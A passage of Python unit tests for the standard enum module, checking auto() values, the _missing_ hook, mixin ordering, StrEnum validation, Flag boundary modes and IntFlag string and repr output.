weird_auto = auto()
weird_auto.value = 'pathological case'
class Color(Enum):
red = weird_auto
def _generate_next_value_(name, start, count, last):
return name
blue = auto()
self.assertEqual(list(Color), [Color.red, Color.blue])
self.assertEqual(Color.red.value, 'pathological case')
self.assertEqual(Color.blue.value, 'blue')
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
def test_default_missing(self):
class Color(Enum):
RED = 1
GREEN = 2
BLUE = 3
try:
Color(7)
except ValueError as exc:
self.assertTrue(exc.__context__ is None)
else:
raise Exception('Exception not raised.')
def test_missing(self):
class Color(Enum):
red = 1
green = 2
blue = 3
@classmethod
def _missing_(cls, item):
if item == 'three':
return cls.blue
elif item == 'bad return':
# trigger internal error
return 5
elif item == 'error out':
raise ZeroDivisionError
else:
# trigger not found
return None
self.assertIs(Color('three'), Color.blue)
try:
Color(7)
except ValueError as exc:
self.assertTrue(exc.__context__ is None)
else:
raise Exception('Exception not raised.')
try:
Color('bad return')
except TypeError as exc:
self.assertTrue(isinstance(exc.__context__, ValueError))
else:
raise Exception('Exception not raised.')
try:
Color('error out')
except ZeroDivisionError as exc:
self.assertTrue(isinstance(exc.__context__, ValueError))
else:
raise Exception('Exception not raised.')
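# The `_missing_` hook exercised above is the supported way to customize
# value lookup.  A minimal sketch (the `Fruit` class is hypothetical):
#
#     class Fruit(Enum):
#         APPLE = 'apple'
#         @classmethod
#         def _missing_(cls, value):
#             # fall back to a case-insensitive name lookup
#             if isinstance(value, str):
#                 return cls.__members__.get(value.upper())
#             return None
#
#     Fruit('APPLE') is Fruit.APPLE   # True, resolved via _missing_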
def test_missing_exceptions_reset(self):
import weakref
#
class TestEnum(enum.Enum):
VAL1 = 'val1'
VAL2 = 'val2'
#
class Class1:
def __init__(self):
# Gracefully handle an exception of our own making
try:
raise ValueError()
except ValueError:
pass
#
class Class2:
def __init__(self):
# Gracefully handle an exception of Enum's making
try:
TestEnum('invalid_value')
except ValueError:
pass
# No strong refs here so these are free to die.
class_1_ref = weakref.ref(Class1())
class_2_ref = weakref.ref(Class2())
#
# The exception raised by Enum used to create a reference loop, keeping
# Class2 instances alive until the next garbage collection cycle, unlike
# Class1; both references should now be dead immediately.
self.assertIs(class_1_ref(), None)
self.assertIs(class_2_ref(), None)
def test_multiple_mixin(self):
class MaxMixin:
@classproperty
def MAX(cls):
max = len(cls)
cls.MAX = max
return max
class StrMixin:
def __str__(self):
return self._name_.lower()
class SomeEnum(Enum):
def behavior(self):
return 'booyah'
class AnotherEnum(Enum):
def behavior(self):
return 'nuhuh!'
def social(self):
return "what's up?"
class Color(MaxMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'BLUE')
class Color(MaxMixin, StrMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, MaxMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'blue')
class CoolColor(StrMixin, SomeEnum, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolColor.RED.value, 1)
self.assertEqual(CoolColor.GREEN.value, 2)
self.assertEqual(CoolColor.BLUE.value, 3)
self.assertEqual(str(CoolColor.BLUE), 'blue')
self.assertEqual(CoolColor.RED.behavior(), 'booyah')
class CoolerColor(StrMixin, AnotherEnum, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolerColor.RED.value, 1)
self.assertEqual(CoolerColor.GREEN.value, 2)
self.assertEqual(CoolerColor.BLUE.value, 3)
self.assertEqual(str(CoolerColor.BLUE), 'blue')
self.assertEqual(CoolerColor.RED.behavior(), 'nuhuh!')
self.assertEqual(CoolerColor.RED.social(), "what's up?")
class CoolestColor(StrMixin, SomeEnum, AnotherEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolestColor.RED.value, 1)
self.assertEqual(CoolestColor.GREEN.value, 2)
self.assertEqual(CoolestColor.BLUE.value, 3)
self.assertEqual(str(CoolestColor.BLUE), 'blue')
self.assertEqual(CoolestColor.RED.behavior(), 'booyah')
self.assertEqual(CoolestColor.RED.social(), "what's up?")
class ConfusedColor(StrMixin, AnotherEnum, SomeEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(ConfusedColor.RED.value, 1)
self.assertEqual(ConfusedColor.GREEN.value, 2)
self.assertEqual(ConfusedColor.BLUE.value, 3)
self.assertEqual(str(ConfusedColor.BLUE), 'blue')
self.assertEqual(ConfusedColor.RED.behavior(), 'nuhuh!')
self.assertEqual(ConfusedColor.RED.social(), "what's up?")
class ReformedColor(StrMixin, IntEnum, SomeEnum, AnotherEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(ReformedColor.RED.value, 1)
self.assertEqual(ReformedColor.GREEN.value, 2)
self.assertEqual(ReformedColor.BLUE.value, 3)
self.assertEqual(str(ReformedColor.BLUE), 'blue')
self.assertEqual(ReformedColor.RED.behavior(), 'booyah')
self.assertEqual(ConfusedColor.RED.social(), "what's up?")
self.assertTrue(issubclass(ReformedColor, int))
def test_multiple_inherited_mixin(self):
@unique
class Decision1(StrEnum):
REVERT = "REVERT"
REVERT_ALL = "REVERT_ALL"
RETRY = "RETRY"
class MyEnum(StrEnum):
pass
@unique
class Decision2(MyEnum):
REVERT = "REVERT"
REVERT_ALL = "REVERT_ALL"
RETRY = "RETRY"
def test_multiple_mixin_inherited(self):
class MyInt(int):
def __new__(cls, value):
return super().__new__(cls, value)
class HexMixin:
def __repr__(self):
return hex(self)
class MyIntEnum(HexMixin, MyInt, enum.Enum):
pass
class Foo(MyIntEnum):
TEST = 1
self.assertTrue(isinstance(Foo.TEST, MyInt))
self.assertEqual(repr(Foo.TEST), "0x1")
class Fee(MyIntEnum):
TEST = 1
def __new__(cls, value):
value += 1
member = int.__new__(cls, value)
member._value_ = value
return member
self.assertEqual(Fee.TEST, 2)
def test_empty_globals(self):
# bpo-35717: sys._getframe(2).f_globals['__name__'] fails with KeyError
# when using compile and exec because f_globals is empty
code = "from enum import Enum; Enum('Animal', 'ANT BEE CAT DOG')"
code = compile(code, "<string>", "exec")
global_ns = {}
local_ls = {}
exec(code, global_ns, local_ls)
def test_strenum(self):
class GoodStrEnum(StrEnum):
one = '1'
two = '2'
three = b'3', 'ascii'
four = b'4', 'latin1', 'strict'
self.assertEqual(GoodStrEnum.one, '1')
self.assertEqual(str(GoodStrEnum.one), '1')
self.assertEqual(GoodStrEnum.one, str(GoodStrEnum.one))
self.assertEqual(GoodStrEnum.one, '{}'.format(GoodStrEnum.one))
#
class DumbMixin:
def __str__(self):
return "don't do this"
class DumbStrEnum(DumbMixin, StrEnum):
five = '5'
six = '6'
seven = '7'
self.assertEqual(DumbStrEnum.seven, '7')
self.assertEqual(str(DumbStrEnum.seven), "don't do this")
#
class EnumMixin(Enum):
def hello(self):
print('hello from %s' % (self, ))
class HelloEnum(EnumMixin, StrEnum):
eight = '8'
self.assertEqual(HelloEnum.eight, '8')
self.assertEqual(HelloEnum.eight, str(HelloEnum.eight))
#
class GoodbyeMixin:
def goodbye(self):
print('%s wishes you a fond farewell' % (self, ))
class GoodbyeEnum(GoodbyeMixin, EnumMixin, StrEnum):
nine = '9'
self.assertEqual(GoodbyeEnum.nine, '9')
self.assertEqual(GoodbyeEnum.nine, str(GoodbyeEnum.nine))
#
with self.assertRaisesRegex(TypeError, '1 is not a string'):
class FirstFailedStrEnum(StrEnum):
one = 1
two = '2'
with self.assertRaisesRegex(TypeError, "2 is not a string"):
class SecondFailedStrEnum(StrEnum):
one = '1'
two = 2,
three = '3'
with self.assertRaisesRegex(TypeError, '2 is not a string'):
class ThirdFailedStrEnum(StrEnum):
one = '1'
two = 2
with self.assertRaisesRegex(TypeError, 'encoding must be a string, not %r' % (sys.getdefaultencoding, )):
class ThirdFailedStrEnum(StrEnum):
one = '1'
two = b'2', sys.getdefaultencoding
with self.assertRaisesRegex(TypeError, 'errors must be a string, not 9'):
class ThirdFailedStrEnum(StrEnum):
one = '1'
two = b'2', 'ascii', 9
def test_missing_value_error(self):
with self.assertRaisesRegex(TypeError, "_value_ not set in __new__"):
class Combined(str, Enum):
#
def __new__(cls, value, sequence):
enum = str.__new__(cls, value)
if '(' in value:
fis_name, segment = value.split('(', 1)
segment = segment.strip(' )')
else:
fis_name = value
segment = None
enum.fis_name = fis_name
enum.segment = segment
enum.sequence = sequence
return enum
#
def __repr__(self):
return "<%s.%s>" % (self.__class__.__name__, self._name_)
#
key_type = 'An$(1,2)', 0
company_id = 'An$(3,2)', 1
code = 'An$(5,1)', 2
description = 'Bn$', 3
@unittest.skipUnless(
sys.version_info[:2] == (3, 9),
'private variables are now normal attributes',
)
def test_warning_for_private_variables(self):
with self.assertWarns(DeprecationWarning):
class Private(Enum):
__corporal = 'Radar'
self.assertEqual(Private._Private__corporal.value, 'Radar')
try:
with self.assertWarns(DeprecationWarning):
class Private(Enum):
__major_ = 'Hoolihan'
except ValueError:
pass
def test_private_variable_is_normal_attribute(self):
class Private(Enum):
__corporal = 'Radar'
__major_ = 'Hoolihan'
self.assertEqual(Private._Private__corporal, 'Radar')
self.assertEqual(Private._Private__major_, 'Hoolihan')
@unittest.skipUnless(
sys.version_info[:2] < (3, 12),
'member-member access now raises an exception',
)
def test_warning_for_member_from_member_access(self):
with self.assertWarns(DeprecationWarning):
class Di(Enum):
YES = 1
NO = 0
nope = Di.YES.NO
self.assertIs(Di.NO, nope)
@unittest.skipUnless(
sys.version_info[:2] >= (3, 12),
'member-member access currently issues a warning',
)
def test_exception_for_member_from_member_access(self):
with self.assertRaisesRegex(AttributeError, "Di: no instance attribute .NO."):
class Di(Enum):
YES = 1
NO = 0
nope = Di.YES.NO
def test_strenum_auto(self):
class Strings(StrEnum):
ONE = auto()
TWO = auto()
self.assertEqual([Strings.ONE, Strings.TWO], ['one', 'two'])
def test_dynamic_members_with_static_methods(self):
#
foo_defines = {'FOO_CAT': 'aloof', 'BAR_DOG': 'friendly', 'FOO_HORSE': 'big'}
class Foo(Enum):
vars().update({
k: v
for k, v in foo_defines.items()
if k.startswith('FOO_')
})
def upper(self):
return self.value.upper()
self.assertEqual(list(Foo), [Foo.FOO_CAT, Foo.FOO_HORSE])
self.assertEqual(Foo.FOO_CAT.value, 'aloof')
self.assertEqual(Foo.FOO_HORSE.upper(), 'BIG')
#
with self.assertRaisesRegex(TypeError, "'FOO_CAT' already defined as: 'aloof'"):
class FooBar(Enum):
vars().update({
k: v
for k, v in foo_defines.items()
if k.startswith('FOO_')
},
**{'FOO_CAT': 'small'},
)
def upper(self):
return self.value.upper()
class TestOrder(unittest.TestCase):
def test_same_members(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
def test_same_members_with_aliases(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
verde = green
def test_same_members_wrong_order(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
blue = 3
green = 2
def test_order_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
def test_order_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
verde = green
def test_enum_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
def test_enum_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
verde = green
class TestFlag(unittest.TestCase):
"""Tests of the Flags."""
class Perm(Flag):
R, W, X = 4, 2, 1
class Open(Flag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
class Color(Flag):
BLACK = 0
RED = 1
ROJO = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
WHITE = RED|GREEN|BLUE
BLANCO = RED|GREEN|BLUE
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'R')
self.assertEqual(str(Perm.W), 'W')
self.assertEqual(str(Perm.X), 'X')
self.assertEqual(str(Perm.R | Perm.W), 'R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'R|W|X')
self.assertEqual(str(Perm(0)), 'Perm(0)')
self.assertEqual(str(~Perm.R), 'W|X')
self.assertEqual(str(~Perm.W), 'R|X')
self.assertEqual(str(~Perm.X), 'R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm(0)')
self.assertEqual(str(Perm(~0)), 'R|W|X')
Open = self.Open
self.assertEqual(str(Open.RO), 'RO')
self.assertEqual(str(Open.WO), 'WO')
self.assertEqual(str(Open.AC), 'AC')
self.assertEqual(str(Open.RO | Open.CE), 'CE')
self.assertEqual(str(Open.WO | Open.CE), 'WO|CE')
self.assertEqual(str(~Open.RO), 'WO|RW|CE')
self.assertEqual(str(~Open.WO), 'RW|CE')
self.assertEqual(str(~Open.AC), 'CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'AC')
self.assertEqual(str(~(Open.WO | Open.CE)), 'RW')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), 'Perm.R')
self.assertEqual(repr(Perm.W), 'Perm.W')
self.assertEqual(repr(Perm.X), 'Perm.X')
self.assertEqual(repr(Perm.R | Perm.W), 'Perm.R|Perm.W')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), 'Perm.R|Perm.W|Perm.X')
self.assertEqual(repr(Perm(0)), '0x0')
self.assertEqual(repr(~Perm.R), 'Perm.W|Perm.X')
self.assertEqual(repr(~Perm.W), 'Perm.R|Perm.X')
self.assertEqual(repr(~Perm.X), 'Perm.R|Perm.W')
self.assertEqual(repr(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '0x0')
self.assertEqual(repr(Perm(~0)), 'Perm.R|Perm.W|Perm.X')
Open = self.Open
self.assertEqual(repr(Open.RO), 'Open.RO')
self.assertEqual(repr(Open.WO), 'Open.WO')
self.assertEqual(repr(Open.AC), 'Open.AC')
self.assertEqual(repr(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(repr(Open.WO | Open.CE), 'Open.WO|Open.CE')
self.assertEqual(repr(~Open.RO), 'Open.WO|Open.RW|Open.CE')
self.assertEqual(repr(~Open.WO), 'Open.RW|Open.CE')
self.assertEqual(repr(~Open.AC), 'Open.CE')
self.assertEqual(repr(~(Open.RO | Open.CE)), 'Open.AC')
self.assertEqual(repr(~(Open.WO | Open.CE)), 'Open.RW')
def test_format(self):
Perm = self.Perm
self.assertEqual(format(Perm.R, ''), 'R')
self.assertEqual(format(Perm.R | Perm.X, ''), 'R|X')
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual((i | j), Perm(i.value | j.value))
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for i in Perm:
self.assertIs(i | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual((i & j).value, i.value & j.value)
self.assertIs(type(i & j), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & RWX, i)
self.assertIs(RWX & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for i in Perm:
self.assertIs(i ^ Perm(0), i)
self.assertIs(Perm(0) ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
def test_boundary(self):
self.assertIs(enum.Flag._boundary_, STRICT)
class Iron(Flag, boundary=STRICT):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Iron._boundary_, STRICT)
#
class Water(Flag, boundary=CONFORM):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Water._boundary_, CONFORM)
#
class Space(Flag, boundary=EJECT):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Space._boundary_, EJECT)
#
class Bizarre(Flag, boundary=KEEP):
b = 3
c = 4
d = 6
#
self.assertRaisesRegex(ValueError, 'invalid value: 7', Iron, 7)
self.assertIs(Water(7), Water.ONE|Water.TWO)
self.assertIs(Water(~9), Water.TWO)
self.assertEqual(Space(7), 7)
self.assertTrue(type(Space(7)) is int)
self.assertEqual(list(Bizarre), [Bizarre.c])
self.assertIs(Bizarre(3), Bizarre.b)
self.assertIs(Bizarre(6), Bizarre.d)
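# In short: STRICT rejects unknown bits with ValueError, CONFORM silently
# discards them, EJECT returns a plain int, and KEEP retains the extra
# bits -- exactly what the four classes above demonstrate.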
def test_iter(self):
Color = self.Color
Open = self.Open
self.assertEqual(list(Color), [Color.RED, Color.GREEN, Color.BLUE])
self.assertEqual(list(Open), [Open.WO, Open.RW, Open.CE])
def test_programmatic_function_string(self):
Perm = Flag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programmatic_function_string_with_start(self):
Perm = Flag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programmatic_function_string_list(self):
Perm = Flag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programmatic_function_iterable(self):
Perm = Flag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programmatic_function_from_dict(self):
Perm = Flag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_pickle(self):
if isinstance(FlagStooges, Exception):
raise FlagStooges
test_pickle_dump_load(self.assertIs, FlagStooges.CURLY|FlagStooges.MOE)
test_pickle_dump_load(self.assertIs, FlagStooges)
def test_contains(self):
Open = self.Open
Color = self.Color
self.assertFalse(Color.BLACK in Open)
self.assertFalse(Open.RO in Color)
with self.assertRaises(TypeError):
'BLACK' in Color
with self.assertRaises(TypeError):
'RO' in Open
with self.assertRaises(TypeError):
1 in Color
with self.assertRaises(TypeError):
1 in Open
def test_member_contains(self):
Perm = self.Perm
R, W, X = Perm
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
def test_member_iter(self):
Color = self.Color
self.assertEqual(list(Color.BLACK), [])
self.assertEqual(list(Color.PURPLE), [Color.RED, Color.BLUE])
self.assertEqual(list(Color.BLUE), [Color.BLUE])
self.assertEqual(list(Color.GREEN), [Color.GREEN])
self.assertEqual(list(Color.WHITE), [Color.RED, Color.GREEN, Color.BLUE])
self.assertEqual(list(Color.WHITE), [Color.RED, Color.GREEN, Color.BLUE])
def test_member_length(self):
self.assertEqual(self.Color.__len__(self.Color.BLACK), 0)
self.assertEqual(self.Color.__len__(self.Color.GREEN), 1)
self.assertEqual(self.Color.__len__(self.Color.PURPLE), 2)
self.assertEqual(self.Color.__len__(self.Color.BLANCO), 3)
def test_number_reset_and_order_cleanup(self):
class Confused(Flag):
_order_ = 'ONE TWO FOUR DOS EIGHT SIXTEEN'
ONE = auto()
TWO = auto()
FOUR = auto()
DOS = 2
EIGHT = auto()
SIXTEEN = auto()
self.assertEqual(
list(Confused),
[Confused.ONE, Confused.TWO, Confused.FOUR, Confused.EIGHT, Confused.SIXTEEN])
self.assertIs(Confused.TWO, Confused.DOS)
self.assertEqual(Confused.DOS._value_, 2)
self.assertEqual(Confused.EIGHT._value_, 8)
self.assertEqual(Confused.SIXTEEN._value_, 16)
def test_aliases(self):
Color = self.Color
self.assertEqual(Color(1).name, 'RED')
self.assertEqual(Color['ROJO'].name, 'RED')
self.assertEqual(Color(7).name, 'WHITE')
self.assertEqual(Color['BLANCO'].name, 'WHITE')
self.assertIs(Color.BLANCO, Color.WHITE)
Open = self.Open
self.assertIs(Open['AC'], Open.AC)
def test_auto_number(self):
class Color(Flag):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 4)
def test_auto_number_garbage(self):
with self.assertRaisesRegex(TypeError, 'Invalid Flag value: .not an int.'):
class Color(Flag):
red = 'not an int'
blue = auto()
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
def test_bizarre(self):
with self.assertRaisesRegex(TypeError, "invalid Flag 'Bizarre' -- missing values: 1, 2"):
class Bizarre(Flag):
b = 3
c = 4
d = 6
def test_multiple_mixin(self):
class AllMixin:
@classproperty
def ALL(cls):
members = list(cls)
all_value = None
if members:
all_value = members[0]
for member in members[1:]:
all_value |= member
cls.ALL = all_value
return all_value
class StrMixin:
def __str__(self):
return self._name_.lower()
class Color(AllMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'BLUE')
class Color(AllMixin, StrMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, AllMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
@threading_helper.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(Flag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with threading_helper.start_threads(threads):
pass
# check that exactly 248 composite members were created (the 256
# values seen include the 8 canonical members)
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
def test_init_subclass(self):
class MyEnum(Flag):
def __init_subclass__(cls, **kwds):
super().__init_subclass__(**kwds)
self.assertFalse(cls.__dict__.get('_test', False))
cls._test1 = 'MyEnum'
#
class TheirEnum(MyEnum):
def __init_subclass__(cls, **kwds):
super(TheirEnum, cls).__init_subclass__(**kwds)
cls._test2 = 'TheirEnum'
class WhoseEnum(TheirEnum):
def __init_subclass__(cls, **kwds):
pass
class NoEnum(WhoseEnum):
ONE = 1
self.assertEqual(TheirEnum.__dict__['_test1'], 'MyEnum')
self.assertEqual(WhoseEnum.__dict__['_test1'], 'MyEnum')
self.assertEqual(WhoseEnum.__dict__['_test2'], 'TheirEnum')
self.assertFalse(NoEnum.__dict__.get('_test1', False))
self.assertFalse(NoEnum.__dict__.get('_test2', False))
#
class OurEnum(MyEnum):
def __init_subclass__(cls, **kwds):
cls._test2 = 'OurEnum'
class WhereEnum(OurEnum):
def __init_subclass__(cls, **kwds):
pass
class NeverEnum(WhereEnum):
ONE = 1
self.assertEqual(OurEnum.__dict__['_test1'], 'MyEnum')
self.assertFalse(WhereEnum.__dict__.get('_test1', False))
self.assertEqual(WhereEnum.__dict__['_test2'], 'OurEnum')
self.assertFalse(NeverEnum.__dict__.get('_test1', False))
self.assertFalse(NeverEnum.__dict__.get('_test2', False))
class TestIntFlag(unittest.TestCase):
"""Tests of the IntFlags."""
class Perm(IntFlag):
R = 1 << 2
W = 1 << 1
X = 1 << 0
class Open(IntFlag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
class Color(IntFlag):
BLACK = 0
RED = 1
ROJO = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
WHITE = RED|GREEN|BLUE
BLANCO = RED|GREEN|BLUE
class Skip(IntFlag):
FIRST = 1
SECOND = 2
EIGHTH = 8
def test_type(self):
Perm = self.Perm
self.assertTrue(Perm._member_type_ is int)
Open = self.Open
for f in Perm:
self.assertTrue(isinstance(f, Perm))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Perm.W | Perm.X, Perm))
self.assertEqual(Perm.W | Perm.X, 3)
for f in Open:
self.assertTrue(isinstance(f, Open))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Open.WO | Open.RW, Open))
self.assertEqual(Open.WO | Open.RW, 3)
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'R')
self.assertEqual(str(Perm.W), 'W')
self.assertEqual(str(Perm.X), 'X')
self.assertEqual(str(Perm.R | Perm.W), 'R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'R|W|X')
self.assertEqual(str(Perm.R | 8), '12')
self.assertEqual(str(Perm(0)), 'Perm(0)')
self.assertEqual(str(Perm(8)), '8')
self.assertEqual(str(~Perm.R), 'W|X')
self.assertEqual(str(~Perm.W), 'R|X')
self.assertEqual(str(~Perm.X), 'R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm(0)')
self.assertEqual(str(~(Perm.R | 8)), '-13')
self.assertEqual(str(Perm(~0)), 'R|W|X')
self.assertEqual(str(Perm(~8)), '-9')
Open = self.Open
self.assertEqual(str(Open.RO), 'RO')
self.assertEqual(str(Open.WO), 'WO')
self.assertEqual(str(Open.AC), 'AC')
self.assertEqual(str(Open.RO | Open.CE), 'CE')
